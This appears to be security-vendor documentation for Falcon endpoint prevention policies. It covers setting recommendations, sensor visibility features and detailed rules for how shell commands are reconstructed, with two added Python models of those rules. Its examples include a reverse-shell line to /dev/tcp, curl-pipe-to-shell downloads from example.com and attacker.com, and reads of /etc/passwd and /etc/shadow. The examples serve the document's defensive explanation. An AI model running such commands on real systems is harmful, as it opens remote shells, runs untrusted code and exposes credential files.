Behavior-based Prevention

Exploitation Behavior

Chopper Webshell Prevention

Enabled

Behavior-based Prevention

Exploitation Behavior

Drive-by Download Prevention

Enabled

Behavior-based Prevention

Exploitation Behavior

Code Injection Prevention

Enabled

Behavior-based Prevention

Exploitation Behavior

JavaScript Execution Via Rundll32 Prevention

Enabled

Behavior-based Prevention

Lateral Movement and Credential Access

Windows Logon Bypass ("Sticky Keys") Prevention

Enabled

Behavior-based Prevention

Lateral Movement and Credential Access

Credential Dumping Prevention

Enabled

Behavior-Based Prevention

Remediation

Advanced Remediation

Enabled

Behavioral detections

Cloud-based detections

Cloud-based anomalous process execution

Moderate

Mac prevention policy setting recommendations
Type | Category | Setting | Recommendation
Sensor Capabilities | - | End User Notifications | Customer preference
Sensor Capabilities | - | Unknown Executable Analysis and Unknown Detection-Related Executable Analysis | Enabled
Sensor Capabilities | - | Sensor Tamper Prevention | Enabled
Sensor Capabilities | - | Suspicious File QuickScan Pro Analysis | Customer preference
Sensor Visibility | Enhanced Visibility | Enhanced Network Visibility | Enabled
Sensor Visibility | Enhanced Visibility | Script-Based Execution Visibility | Enabled
Next-Gen Antivirus | Cloud Machine Learning | Cloud-Based Anti-Malware - Detection | Aggressive
Next-Gen Antivirus | Cloud Machine Learning | Cloud-Based Anti-Malware - Prevention | Moderate+
Next-Gen Antivirus | Cloud Machine Learning | Cloud-Based Adware & PUP - Detection | Aggressive
Next-Gen Antivirus | Cloud Machine Learning | Cloud-Based Adware & PUP - Prevention | Moderate+
Next-Gen Antivirus | Sensor Machine Learning | Sensor-Based Anti-Malware - Detection | Aggressive
Next-Gen Antivirus | Sensor Machine Learning | Sensor-Based Anti-Malware - Prevention | Moderate+
Next-Gen Antivirus | Sensor Machine Learning | Sensor Adware & PUP - Detection | Aggressive
Next-Gen Antivirus | Sensor Machine Learning | Sensor Adware & PUP - Prevention | Moderate+
Next-Gen Antivirus | On Write | Detect on Write | Enabled
Next-Gen Antivirus | On Write | Quarantine on Write | Enabled
Next-Gen Antivirus | Quarantine | Quarantine | Enabled
Malware Protection | Execution Blocking | Custom Indicator Blocking | Enabled
Malware Protection | Execution Blocking | Suspicious Process Prevention | Enabled
Malware Protection | Execution Blocking | Intelligence-Sourced Threat Prevention | Enabled
Behavior-based Prevention | Unauthorized Remote Access IOAs | XPCOM Shell Prevention | Enabled
Behavior-based Prevention | Unauthorized Remote Access IOAs | Chopper Webshell Prevention | Enabled
Behavior-based Prevention | Unauthorized Remote Access IOAs | Empyre Backdoor Prevention | Enabled
Behavior-based Prevention | Credential Dumping IOAs | KcPassword Decoded Prevention | Enabled
Behavior-based Prevention | Credential Dumping IOAs | Hash Collector Prevention | Enabled

Linux prevention policy recommendation settings
Table 1. Enhance Systemd Visibility
Type | Category | Setting | Recommendation
Sensor Capabilities | - | Unknown Executable Analysis and Unknown Detection-Related Executable Analysis | Enabled
Sensor Capabilities | - | Sensor Tamper Prevention | Enabled
Sensor Capabilities | - | Suspicious File QuickScan Pro Analysis | Customer preference
Sensor Visibility | Enhanced Visibility | Script-Based Execution Visibility | Enabled
Sensor Visibility | Enhanced Visibility | SSH Visibility | Enabled
Sensor Visibility | Enhanced Visibility | Filesystem Visibility | Enabled
Sensor Visibility | Enhanced Visibility | Network Visibility | Enabled
Sensor Visibility | Enhanced Visibility | HTTP Visibility | Enabled
Sensor Visibility | Enhanced Visibility | FTP Visibility | Enabled
Sensor Visibility | Enhanced Visibility | TLS Visibility | Enabled
Sensor Visibility | Enhanced Visibility | Email Protocol Visibility | Enabled
Sensor Visibility | Enhanced Visibility | Extended Command Line Visibility | Enabled
Sensor Visibility | Enhanced Visibility | Memory Visibility | Enabled
Sensor Visibility | Enhanced Visibility | D-Bus Visibility | Enabled
Sensor Visibility | Enhanced Visibility | Enhance PHP Visibility | Enabled
Sensor Visibility | Enhanced Visibility | PHP Script Optimization | Customer preference
Sensor Visibility | Enhanced Visibility | Enhance Systemd Visibility | Enabled
Sensor Visibility | Enhanced Visibility | Environment Variable Visibility | Enabled
Next-Gen Antivirus | Cloud Machine Learning | Cloud-Based Anti-Malware - Detection | Aggressive
Next-Gen Antivirus | Cloud Machine Learning | Cloud-Based Anti-Malware - Prevention | Moderate+
Next-Gen Antivirus | On Write | On Write Script File Visibility | Enabled
Next-Gen Antivirus | Sensor Machine Learning | Sensor-Based Anti-Malware - Detection | Aggressive
Next-Gen Antivirus | Sensor Machine Learning | Sensor-Based Anti-Malware - Prevention | Moderate+
Next-Gen Antivirus | Quarantine | Quarantine | Enabled
Malware Protection | Execution Blocking | Custom Indicator Blocking | Enabled
Malware Protection | Execution Blocking | Suspicious Process Prevention | Enabled
Container Protection | Execution Blocking | Container Drift Prevention | Enabled

Machine Learning levels
Level | Description
Disabled | Disable all detections or preventions.
Cautious | Detect or prevent only when our machine learning system has high confidence that something is malicious.
Moderate | Detect or prevent when our machine learning system has moderate confidence that something is malicious. We recommend this setting for most use cases. This setting also detects and prevents activity that would be detected or prevented by Cautious.
Aggressive | Detect or prevent when our machine learning system has low confidence that something is malicious. This setting also detects and prevents activity that would be detected or prevented by Moderate and Cautious.
Extra Aggressive | Detect or prevent when our machine learning system has the lowest confidence that something is malicious. This setting also detects and prevents activity that would be detected or prevented by Aggressive, Moderate, and Cautious.

Sensor Capabilities

End User Notifications

Requirements:

  • Subscription: Falcon Prevent
  • Supported platforms: Windows and Mac

This setting controls whether the Falcon sensor displays a notification when a prevention action occurs. It also writes to the local Windows Event Viewer on Windows hosts. Only the first notification within a 60-second time span is shown to the end user. All subsequent messages within the 60-second threshold are suppressed. This setting has no relevance for detection-only events, and it also has no security implications.

Windows

Windows 7 and 8 use balloon notifications, while Windows 10 uses toast-style messages. All events that result in a notification, regardless of timing, are written to the Windows Application and Services Log.

Mac

Notifications for Mac hosts default to banners.

Unknown Executable Analysis and Unknown Detection-Related Executable Analysis

Requirements:

  • Subscription: Falcon Insight XDR or Falcon Prevent

  • Supported platforms: Windows, Mac, and Linux

Note: This feature isn’t available in CrowdStrike clouds EU-1, US-GOV-1, or US-GOV-2.

An unknown executable is a file with a hash that doesn't match any samples in the CrowdStrike cloud. Unknown executable files include:

  • Windows PE (Portable Executable)

  • Mac Mach-O (Mach Object)

  • Linux ELF (Executable and Linkable Format)

If unknown executables are seen or executed on a host, the Enable Unknown Executable Analysis and Enable Unknown Detection-Related Executable Analysis settings control whether those files are then uploaded to the CrowdStrike cloud for analysis. These files are never shared with any third party.

  • Enable Unknown Executable Analysis to allow hosts to upload any unknown executable files. For Windows, these files are uploaded if they’re executed or written to disk. For Mac and Linux, these files are uploaded only if they’re executed.

  • Enable Unknown Detection-Related Executable Analysis to allow hosts to upload only unknown executable files that have triggered detections.

Uploading unknown executables improves CrowdStrike’s machine learning (ML) models, reduces false positives, increases true positives, and increases the overall efficacy of CrowdStrike detections. CrowdStrike stores uploaded files securely for the purpose of improving detections and never shares them with any other customer or organization.

When unknown executable uploads are enabled, the sensor uploads files that match these criteria:

  • They are unique in the CrowdStrike cloud (based on the file’s hash) and thus have not been uploaded previously

  • They are 32MB or smaller in size, to conserve bandwidth

  • They don't belong to a sensor visibility exclusion that’s been applied to the host

  • They don't belong to an applicable machine learning exclusion that’s been applied to the host

We also incorporate the data from these uploaded files into our future machine learning training to reduce false positives and increase true positives.

To exclude certain files and folders from being uploaded, create a machine learning (ML) exclusion with the Uploads to CrowdStrike checkbox selected, and then wait for the policy to be applied. For more info, see Exclusions.


Create ML exclusion with Uploads to CrowdStrike checkbox selected

Linux

Before you enable either of these settings, you must enable Cloud Anti-malware.

Sensor Tamper Prevention

Requirements:

  • Subscription: Falcon Prevent

  • Supported platforms: Windows, Mac, and Linux

    Important: User mode of the Falcon sensor for Linux supports blocking capabilities for hosts running on ARM kernels that are version 6.0 and later only. The sensor still creates detections in user mode for hosts running on ARM kernels that are earlier than version 6.0. Blocking capabilities are supported in user mode for all supported Linux kernel versions that are not ARM architecture. Blocking capabilities are supported in kernel mode for all supported Linux kernel versions and architectures.

When enabled, this setting blocks attempts to tamper with the sensor. If disabled, the sensor still creates detections for tampering attempts but doesn’t block them. This is one of our most critical prevention settings, because it's very common for adversaries to attempt to disable endpoint security in order to evade detection and/or to establish persistence.

Important: Enabling the Sensor tamper prevention policy setting does not block uninstallation of the sensor on your hosts. To prevent unauthorized uninstallation of the sensor, enable the Uninstall and maintenance protection sensor update policy setting for your hosts. For more info, see Managing sensor maintenance and uninstallation.

Windows: When enabled, it protects the sensor-related files, folders, and registry objects from renaming or deletion.

Mac: When enabled, it protects the sensor-related files and folders from modification, renaming, or deletion.

Linux: When enabled, it protects additional sensor resources, such as memory and BPF resources, from modification.

Tip: To use utility tools like bpftool on Linux hosts with Sensor tamper prevention enabled, ensure that the tools have read-only access to the BPF maps.

Suspicious File QuickScan Pro Analysis

Requirements:

  • Requires one of these subscriptions:

    • Falcon Insight XDR
    • Falcon Prevent
  • Requires one of these additional subscriptions:
    • Falcon Adversary Intelligence
    • Falcon Adversary Intelligence Premium
  • Supported platforms: Windows, Mac, and Linux

When the Suspicious file QuickScan Pro analysis prevention policy setting is enabled, files are intelligently selected and uploaded to QuickScan Pro based on AI-optimized criteria designed to maximize malware visibility with minimal endpoint resource impact.

This prevention policy setting works independently and doesn't require other prevention policy settings as prerequisites. Unlike the unknown executables flow which uploads all unrecognized files, this targeted approach uses machine learning to prioritize files with the highest potential for malicious verdicts, optimizing malware conversion rates while reducing upload volume. Files larger than 32MB are excluded from upload. Sensor visibility exclusions apply.

The intelligent file selection algorithm analyzes these trigger sources to identify files for upload:

  • File written events

  • Static analysis response events

  • Module load events

  • Driver load events

  • File rename events

Important: Legal Disclaimer. You acknowledge and accept that files submitted might contain confidential information, including personal and sensitive information, and we may retain these files for security research and product improvement purposes as permitted under our Terms and Conditions and Privacy Notice. You may configure exclusions to prevent files in trusted file paths from being uploaded to the CrowdStrike cloud. For more information, see Sensor visibility exclusions.

Enhanced Visibility category

The Enhanced Visibility category contains settings that expand the awareness of the Falcon sensor to provide additional event data.

Enabling these settings provides IOA-based features with additional data to help improve the detection and prevention of potentially malicious activity. This also significantly enhances your investigation and threat-hunting capabilities.

Additional User Mode Data Visibility

Requirements:

  • Subscription: Falcon Insight XDR or Falcon Prevent

  • Supported platform: Windows

Important: This setting is inoperative on Windows ARM64-based hosts.

Additional User Mode Data Visibility (AUMD) lets the sensor gather additional data from the user-mode side of a process by loading a library that hooks system APIs. The sensor injects this DLL to track process and thread activity that uses internal or private APIs, which helps surface detections related to process hijacking or unauthorized reads of process data. Some endpoint telemetry can only be gathered through user-mode hooking, as with programs that interact with the system through a GUI manager application rather than the command line. The component is a separate DLL (umppc.dll) that gathers critical data for exploit mitigation, additional detections, and user-mode events that cannot be gathered from kernel mode.

This user-mode data is required for multiple key prevention policies and several high-confidence detections around credential theft and process migration.

Additional User Mode Data Visibility is a prerequisite for these settings:

Because AUMD functions at the user-mode level, interaction conflicts with other security tools occasionally occur. There is no detection in such cases; the conflicting tool simply doesn't run. In that scenario, move a test system into a policy where AUMD is disabled, reboot the host, and retry. If the security tool now runs, open a Support case for assistance in resolving the conflict.

You can see processes AUMD is hooked into by running the following from a command-line on a host:

tasklist /m umppc* <ENTER>

D-Bus Visibility

Requirements:

  • Subscription: Falcon Insight XDR or Falcon Prevent

  • Sensor: Falcon sensor for Linux 7.26 or later running in User Mode. Sensors running in Kernel Mode (KM) will not support this setting, and enabling this setting on hosts running in KM will have no effect.

  • Default roles: Falcon Admin

  • Supported platform: Linux

When the D-Bus Visibility policy setting is enabled on hosts, the Falcon sensor generates telemetry that provides visibility into D-Bus messages flowing over local Unix sockets between processes. This is captured in the form of a new event: DBusMessage. The sensor will produce events for each message and apply any relevant detections.

The D-Bus communication model allows different types of methods or signals to be used for inter-process communication. However, only method call messages are sent to the cloud.

Email Protocol Visibility

Requirements:

  • Subscription: Falcon Prevent or Falcon Insight XDR
  • Supported platform: Linux
  • Sensor support: Falcon sensor for Linux 6.53 and later
    Note: This feature is available for the sensor running in kernel mode. User mode is supported with the Falcon sensor for Linux version 7.11 and later.
  • CrowdStrike clouds: Available in all clouds

Monitor SMTP, IMAP, and POP3 traffic for malicious patterns and improved detections. The resulting telemetry enhances hunting capabilities and enables future IOA-based detections for multiple threat categories. Once enabled, Email Protocol Visibility provides visibility into the following events:

Note: Depending on the role of the host, such as a mail or mail relay server with Email Protocol Visibility enabled, you might see an increase in host CPU utilization.

Extended Command Line Visibility

The Extended Command Line Visibility prevention policy enhances your Linux security monitoring by providing detailed visibility into complex shell commands, including pipes and redirections. This helps security teams better understand command execution patterns for potential threats.

Extended Command Line Visibility requirements
  • Subscription: Falcon Insight XDR or Falcon Prevent

  • Supported platform: Linux

  • Sensor support: Falcon sensor for Linux 7.22 and later, running in user mode only

Supported shell types and operators

Supported operators for supported shell types:

  • bash: |&, |, <, >, >>, &>, 2>&1, &>>, <>, 2>, 2>>, <<, <<<
  • dash: |, <, >, >>, 2>&1, <>, 2>, 2>>
  • tcsh: |, |&, <, >, &>, >>, &>>

How Extended Command Line Visibility works

When this prevention policy setting is disabled, complex commands that raise detections are displayed in the Falcon console as basic commands. However, when you enable Extended Command Line Visibility on a Linux prevention policy, the sensor parses and reconstructs complex commands, such as piped commands and reverse shell commands, to show you the full command structure. This provides a more accurate representation by revealing underlying operations, without terminating or blocking CLI commands or scripts.

Important: We only reconstruct interactive shell commands or commands within shell scripts that have job control enabled.

The following comparison shows how complex commands are displayed when the policy setting is enabled and when it is disabled.

  • Enabled: curl http://example.com/example.sh | sh
    Disabled: curl http://example.com/example.sh
  • Enabled: cat /etc/passwd > example.txt
    Disabled: cat /etc/passwd
  • Enabled: bash -i >& /dev/tcp/203.0.113.1/9001 0>&1
    Disabled: bash -i

Memory impact and policy configuration

The Extended Command Line Visibility prevention policy setting is part of the Enhanced Visibility category of the Linux prevention policy.

This policy setting is disabled by default. Before you enable this setting, consider the following requirements:

  • For any new and existing policy, this setting must be manually enabled.

  • For each host, enabling the policy setting might result in a small increase in host memory consumption. Even in the worst case of extremely large workloads with interactive shell executions, we anticipate that the additional memory requirement will not exceed 110MB per host.

  • You might notice a minor increase in sensor CPU utilization and a small increase in total time to complete workloads with shell redirects that have long file paths.

    Important: Consider this memory requirement when planning your deployment, especially for environments with many sensors.

Enable Extended Command Line Visibility

To enable Extended Command Line Visibility, set it when you create a new policy or edit an existing policy.

Extended Command Line Visibility limitations

Extended Command Line Visibility has several important limitations that affect command reconstruction. The following sections detail these limitations across different categories.

Operator limitations

Operators && and || cannot be reconstructed. For example, a piped command with an AND or OR operator displays 2 detections with no logical connection:

  • Original command: cat /etc/shadow | grep root > example.txt || curl -s http://attacker.com/backdoor.sh | sh
  • Reconstructed result:
    • cat /etc/shadow | grep root > example.txt
    • curl -s http://attacker.com/backdoor.sh | sh

Built-in command and binary execution failures

Built-in shell commands, such as cd, or binaries that fail to execute in a shell are reconstructed with an (unknown) placeholder. For example, the following command is reconstructed with a placeholder:

  • Original command: cd /path/example | example
  • Reconstructed command: (unknown) | example

Built-in command limitations

Command reconstruction for shell built-in commands only occurs if there is at least one pipe (|) in the command line. For example:

  • Not reconstructed: echo "hello" > /tmp/xyz
  • Reconstructed: echo "hello" > /tmp/xyz | grep "foobar"

Dash shell limitations

Command reconstruction for a dash shell only occurs if there is at least one pipe (|) in the command line. For example:

  • Not reconstructed: cat /etc/passwd > /tmp/xyz
  • Reconstructed: cat /etc/passwd > /tmp/xyz | grep "foobar"

tty redirection limitations

When a command includes a redirection to a tty assigned to the shell process, the redirection is not in the reconstructed output. For example:

  • Command cat /etc/passwd 2>&1 is reconstructed as cat /etc/passwd
  • Command cat /etc/passwd 2>&1 > /tmp/out is reconstructed as cat /etc/passwd > /tmp/out

Command line and file name length limitations

Commands are truncated, and the keyword truncated is appended to the reconstructed command line when length limits are exceeded.

  • More than 10 commands in a shell pipeline: commands after the tenth are not captured.
    Command: cmd_1 | cmd_2 | cmd_3 | cmd_4 | cmd_5 | cmd_6 | cmd_7 | cmd_8 | cmd_9 | cmd_10 | cmd_11
    Reconstruction: cmd_1 | cmd_2 | cmd_3 | cmd_4 | cmd_5 | cmd_6 | cmd_7 | cmd_8 | cmd_9 | cmd_10 (truncated)
  • Reconstructed command line that exceeds 4096 bytes.
    Command: cmd_1_4000_bytes | cmd_2_1000_bytes
    Reconstruction: cmd_1_4000_bytes | cmd_2_1000_bytes (truncated)
  • Redirected file name for a standard file descriptor that exceeds 512 bytes.
    Command: cmd_1 > /file_name_600_bytes | cmd_2
    Reconstruction: cmd_1 > /file_name_600_bytes (truncated) | cmd_2

Network redirect command limitations

Command reconstruction for network redirects occurs only if an IPv4 address is used.

Behavior with Sensor Visibility Exclusion (SVE) configured

Sensor Visibility Exclusion (SVE) settings affect command reconstruction in the following two ways:

  • When configured for shells or executed binaries
  • When the 'Apply to all descendant processes' option is enabled

Scenario 1

An exclusion for cmd_1 with "Apply to all descendant processes" enabled:

  • sudo cmd_1 | cmd_2: reconstructed. Even though cmd_1 is excluded, reconstruction occurs because sudo is executed directly by the shell (bash).
  • cmd_1 | cmd_2: not reconstructed. cmd_1 is configured to be excluded.
  • built-in | cmd_2: reconstructed. Neither the shell (bash) nor cmd_2 is excluded.

Scenario 2

Exclusions for both the shell and cmd_1 with "Apply to all descendant processes" enabled:

  • sudo cmd_1 | cmd_2: not reconstructed. The shell (bash) and its descendant processes are excluded.
  • cmd_1 | cmd_2: not reconstructed. The shell (bash) and its descendant processes are excluded.
  • built-in | cmd_2: not reconstructed. The shell (bash) and its descendant processes are excluded.

Scenario 3

An exclusion for the shell without "Apply to all descendant processes", and an exclusion for cmd_1 with "Apply to all descendant processes" enabled:

  • sudo cmd_1 | cmd_2: reconstructed. sudo is executed directly by the shell (bash), and the shell exclusion does not apply to descendants.
  • cmd_1 | cmd_2: not reconstructed. cmd_1 is configured to be excluded.
  • built-in | cmd_2: not reconstructed. The built-in runs in a process forked from the excluded shell (bash).

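
The three scenarios above, encoded as a decision function. This is an added example, not the Falcon sensor's logic or CrowdStrike's code; the names bash, cmd_1, cmd_2 and built-in are the page's own placeholders, and the generalization from the nine documented rows to a rule is an assumption stated in the docstring.

```python
"""Model of how Sensor Visibility Exclusions (SVE) affect command reconstruction.

Added illustration, not the Falcon sensor's logic. It encodes the three
scenarios documented above; the generalization drawn from them is an
assumption: only the process the shell executes directly for a pipeline
stage matters (sudo, not the command that sudo runs), and a shell builtin
runs in a fork of the shell itself, so it is excluded whenever the shell is.
"""
from dataclasses import dataclass

SHELL = "bash"
BUILTINS = {"cd", "echo", "export", "built-in"}   # "built-in" mirrors the page's placeholder


@dataclass
class Exclusion:
    image: str                 # process name the exclusion is configured for
    descendants: bool = False  # the "Apply to all descendant processes" option


def stage_process(stage):
    """Image the shell execs for one pipeline stage; builtins stay in the shell."""
    name = stage.split()[0]
    return SHELL if name in BUILTINS else name


def is_excluded(image, ancestors, exclusions):
    """Excluded if the image itself is listed, or an ancestor is listed with descendants."""
    return any(e.image == image or (e.descendants and e.image in ancestors)
               for e in exclusions)


def reconstructed(command, exclusions):
    """True when Extended Command Line Visibility would reconstruct the pipeline."""
    for stage in (s.strip() for s in command.split("|")):
        if not stage:
            continue
        proc = stage_process(stage)
        # A binary is a child of the shell; a builtin *is* the (forked) shell.
        ancestors = [] if proc == SHELL else [SHELL]
        if is_excluded(proc, ancestors, exclusions):
            return False
    return True


if __name__ == "__main__":
    # Scenario 3 from the text: shell excluded without descendants, cmd_1 with descendants.
    sve = [Exclusion("bash"), Exclusion("cmd_1", descendants=True)]
    for cmd in ("sudo cmd_1 | cmd_2", "cmd_1 | cmd_2", "built-in | cmd_2"):
        print(f"{cmd:20} reconstructed: {reconstructed(cmd, sve)}")
```
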
Shell-specific command reconstruction examples

The following sections show how commands are reconstructed across different shell types.

Bash shell reconstruction

This table shows how bash commands are reconstructed when Extended Command Line Visibility is enabled.

  • >| (with or without the noclobber option set) is reconstructed as >
  • |& is reconstructed as 2>&1 |
  • &>word is reconstructed as >word 2>&1
  • &>>word is reconstructed as >>word 2>&1
  • <<[-] (here documents) and <<< (here strings) are reconstructed as < /tmp/sh-thd
  • <&word (duplication), <&digit- (moving) and <> (read/write) file descriptors: see Example 1
  • >> for network redirects: see Example 2

Example 1: File Descriptor Reconstruction for bash

  • Original: exec 3<> /tmp/out && wc <&3 &>&3
  • Reconstructed: wc </tmp/out> /tmp/out
    Note: Only reconstructed when File Descriptor is used as STDIN, STDOUT or STDERR for redirection.

Example 2: Network Redirect Reconstruction for bash

  • Original: bash -i &>> /dev/tcp/127.0.0.1/7777 0>&1
  • Reconstructed: bash -i &> /dev/tcp/127.0.0.1/7777 0>&1

Dash shell reconstruction

This table shows how dash commands are reconstructed when Extended Command Line Visibility is enabled.

  • >| (with or without the noclobber option set) is reconstructed as >
  • 2>&1 | is kept as 2>&1 |
  • <<[-] (here documents): not supported
  • <&n, &>n (copy), <&-, &>- (close) and <> (read/write) file descriptors: see Example 1
  • Builtins with STDOUT redirected to a file, followed by a redirect to |: see Example 2

Example 1: File Descriptor Reconstruction for dash

  • Original: exec 3<>/tmp/out && wc <&3 2>&3 | tee logfile
  • Reconstructed: wc <> /tmp/out 2>&0 | tee logfile
    Note: Only reconstructed when a file descriptor is used as STDIN, STDOUT or STDERR for redirection.

Example 2: Built-in Command reconstruction for dash

  • Original: echo "world" > /tmp/xyz | grep "foobar"
  • Reconstructed: (unknown) | grep foobar
    Note: Only the final redirect to | is reconstructed

Tcsh shell reconstruction

This table shows how tcsh commands are reconstructed when Extended Command Line Visibility is enabled.

  • <<: not supported
  • >! and >>! (with or without the noclobber option set) are reconstructed as > and >> respectively
  • &>! and &>>! (with or without the noclobber option set) are reconstructed as > (filename) 2>&1 and >> (filename) 2>&1 respectively
  • |& is reconstructed as 2>&1 |

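
The reconstruction rules this section documents, applied in code to the section's own example commands. This is an added illustration, not the Falcon sensor's implementation or CrowdStrike's code: it models the && and || split, the (unknown) placeholder for builtins, the dropped tty redirection, the IPv4-only network redirect rule and the three length limits; where the page leaves a detail open (where an over-long line is cut, which builtins get the placeholder) the choice is an assumption, marked in the comments.

```python
"""Model of the Extended Command Line Visibility reconstruction rules.

Added illustration, not the Falcon sensor's code: it applies the rules this
section documents (&& and || split into separate detections, builtin
placeholders, tty redirections dropped, IPv4-only network redirects, the
10-stage / 4096-byte / 512-byte limits) so an analyst can predict how a
complex command will appear in the console. Where the page leaves a detail
open (where an over-long line is cut, which builtins become "(unknown)"),
the choice made here is an assumption.
"""
import re
import shlex
from dataclasses import dataclass

MAX_STAGES, MAX_LINE_BYTES, MAX_NAME_BYTES = 10, 4096, 512
# Assumption: these builtins never exec a binary, so they are shown as the
# "(unknown)" placeholder; echo is kept, as in the page's bash pipeline example.
PLACEHOLDER_BUILTINS = {"cd", "export", "unset", "alias", "source", "eval"}
SHELL_BUILTINS = PLACEHOLDER_BUILTINS | {"echo", "printf", "test"}

LOGICAL_RE = re.compile(r"\s*(?:&&|\|\|)\s*")   # && and || cannot be reconstructed
PIPE_RE = re.compile(r"\s*(\|&|\|)\s*")           # pipeline stage separators
REDIR_RE = re.compile(r"^(\d*)(&>>|&>|>>|>&|<>|>|<)(.*)$")
NET_RE = re.compile(r"^/dev/(?:tcp|udp)/(?P<host>[^/]+)/\d+$")
IPV4_RE = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")


@dataclass
class Reconstruction:
    text: str
    reconstructed: bool          # False: shown only as the basic command
    truncated: bool = False


def _stage(text, piped_out, merge_stderr):
    """Rebuild one pipeline stage; returns (display text, command words)."""
    toks = shlex.split(text, posix=False)  # posix=False keeps the quotes
    words, redirs = [], []
    stdout_is_tty = not piped_out          # a piped stage writes to the pipe, not the tty
    i = 0
    while i < len(toks):
        m = REDIR_RE.match(toks[i])
        i += 1
        if not m:
            words.append(toks[i - 1])
            continue
        fd, op, target = m.groups()
        if not target and i < len(toks):   # operator and target were separate tokens
            target, i = toks[i], i + 1
        if op == ">&" and target.isdigit():  # fd duplication such as 2>&1 or 0>&1
            src = fd or "1"
            if src == "2" and target == "1" and stdout_is_tty:
                continue                   # stderr onto the shell's tty: not shown
            redirs.append(f"{src}>&{target}")
            continue
        net = NET_RE.match(target)
        if net and not IPV4_RE.match(net.group("host")):
            continue                       # only IPv4 network redirects are reconstructed
        if len(target.encode()) > MAX_NAME_BYTES:
            target = target[:MAX_NAME_BYTES] + " (truncated)"  # cut point: assumption
        if op in (">", ">>", "&>", "&>>", ">&") and fd in ("", "1"):
            stdout_is_tty = False
        redirs.append(f"{fd}{op} {target}")
    if merge_stderr:                       # |& is displayed as 2>&1 |
        redirs.append("2>&1")
    if words and words[0] in PLACEHOLDER_BUILTINS:
        return "(unknown)", words
    return " ".join(words + redirs), words


def reconstruct(cmd, shell="bash"):
    """One logical segment (no && or ||) -> what the console would show."""
    parts = PIPE_RE.split(cmd.strip())     # [stage, op, stage, op, ...]
    stages, ops = parts[0::2], parts[1::2]
    total, truncated = len(stages), len(stages) > MAX_STAGES
    rebuilt = [_stage(st, n < total - 1, n < len(ops) and ops[n] == "|&")
               for n, st in enumerate(stages[:MAX_STAGES])]
    # Builtins, and every dash command, are reconstructed only inside a pipeline
    first = rebuilt[0][1][0] if rebuilt[0][1] else ""
    if total == 1 and (shell == "dash" or first in SHELL_BUILTINS):
        return Reconstruction(" ".join(rebuilt[0][1]), False)
    text = " | ".join(t for t, _ in rebuilt)
    if len(text.encode()) > MAX_LINE_BYTES:
        text, truncated = text[:MAX_LINE_BYTES], True   # cut point: assumption
    return Reconstruction(text + (" (truncated)" if truncated else ""), True, truncated)


def reconstruct_all(cmd, shell="bash"):
    """Split on && / ||: each side becomes a separate, unlinked detection."""
    return [reconstruct(seg, shell) for seg in LOGICAL_RE.split(cmd) if seg]


if __name__ == "__main__":
    # Commands from this section's own examples, with the page's example.com URL.
    for c in ("cat /etc/passwd 2>&1 > /tmp/out", "cd /path/example | example",
              "cat /etc/shadow | grep root > example.txt || curl -s http://example.com/example.sh | sh"):
        for r in reconstruct_all(c):
            print(f"{c!r:70} -> {r.text!r}")
```
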
Enhanced DLL Load Visibility

Requirements:

  • Subscription: Falcon Insight XDR or Falcon Prevent

  • Supported operating systems: Windows Server 2012 and later

  • Sensor support: Falcon sensor for Windows versions 7.20 and later

When enabled, Enhanced Dynamic Link Library (DLL) Load Visibility collects additional information on DLLs that are loaded into a process. This setting improves detection coverage at DLL load time and allows the sensor to send additional telemetry using the ClassifiedModuleLoad event.

Enhanced DLL Load Visibility generally has a negligible impact on CPU performance and telemetry generation. However, when running workloads that have a high number of DLL loads, a small performance reduction can occur. We recommend testing on critical applications before enabling this feature in production environments.

Note: This setting has no impact on hosts running workstation versions of Windows, as this capability has long been available by default on workstations.
Note: This setting supports sensor visibility exclusion. Configuring a sensor visibility exclusion for a specific process eliminates any performance overhead associated with this setting.

Enhanced Exploitation Visibility

Requirements:

  • Subscription: Falcon Insight XDR or Falcon Prevent

  • Supported operating systems:

    • Windows 10 version 1809 and later

    • Windows Server 2019 and later

  • Sensor support: Falcon sensor for Windows versions 7.05 and later

Enhanced Exploitation Visibility enables sources of telemetry in Windows that are disabled by default by Microsoft. This provides the Falcon sensor with enriched visibility into exploitation techniques that are commonly leveraged by adversaries to exploit operating system- or application-level security vulnerabilities.

When the Enhanced Exploitation Visibility policy setting is enabled, the sensor enables exploit mitigation telemetry built into the Windows operating system. With these Windows settings, the sensor sees additional data that helps detect common exploitation techniques. The sensor further enriches this data for event generation. For example, the sensor can determine if an adversary changes memory protections to create the necessary conditions for further execution, such as loading and executing malicious code.

Enhanced Exploitation Visibility generates events for these types of processes:

  • Productivity applications, such as Microsoft Office and Adobe Acrobat Reader

  • Google Chrome and Microsoft Internet Explorer

  • Command line interfaces, such as Command Prompt and PowerShell

Enhanced Exploitation Visibility settings are exclusively applied on a per-process basis. There are no persistent changes to system or registry settings when this feature is enabled. However, exploit mitigation violation events will be written by the operating system to the event log. If needed, applications can be specifically excluded.

If you have applications that already have Windows exploit protection settings enabled independently of your prevention policies, the Falcon sensor receives that telemetry data and will not change predefined settings.

Performance considerations

Enhanced Exploitation Visibility should only have a negligible CPU performance and sensor-related network-traffic impact when processing applicable telemetry data from web browsers and productivity apps. Generated telemetry is also reflected in event logs that can be monitored through event log applications such as Event Viewer.

Note: Sensor visibility exclusions don't apply to Enhanced Exploitation Visibility; however, string-based allow lists (SBAL) are available through support-enacted allowlisting requests.

Enhanced Network Visibility

Requirements:

  • Subscription: Falcon Insight XDR or Falcon Prevent

  • Sensor: Falcon sensor for Mac 7.29 or later

  • CrowdStrike clouds: Available in US-1, US-2, EU-1, and GOV-1

Turn on the Enhanced Network Visibility prevention policy setting to gain insight and improved visibility into network traffic occurring on macOS endpoints. Enhanced network visibility supplements process activity monitoring with attributes derived from the contents of network traffic. This monitoring identifies specific application protocols, analyzes TLS (encrypted) traffic characteristics, and examines plaintext HTTP content. This feature does not perform decryption of any network traffic.

Enhanced network visibility includes JA4 fingerprinting of TLS connections. This enhancement provides a summarized representation or signature of the capabilities and configuration of a specific TLS client library. This signature is derived from the TLS "client hello" packet, the first step in establishing a secure connection. JA4 can be used to differentiate between otherwise indistinguishable TLS connections; also, it can provide evidence of proxying if a single process exhibits several unique JA4 signatures.

Supported protocols

Enhanced network visibility supports parsing of plaintext HTTP requests and responses and TLS client hello packets.

Additionally, enhanced network visibility identifies the use of the HTTP, TLS, QUIC, SOCKS4/5, WireGuard, SSH, SMB, VNC, ARD, or DNS protocol on any network port, and emits an AppProtocolDetected event when a process makes use of one of these protocols. Limited visibility into proxied network traffic is also supported.

Protocol       | AppProtocol value | Capability                     | Description
HTTP 1.x       | 110               | Identify and Inspect           | Plaintext HTTP requests and responses
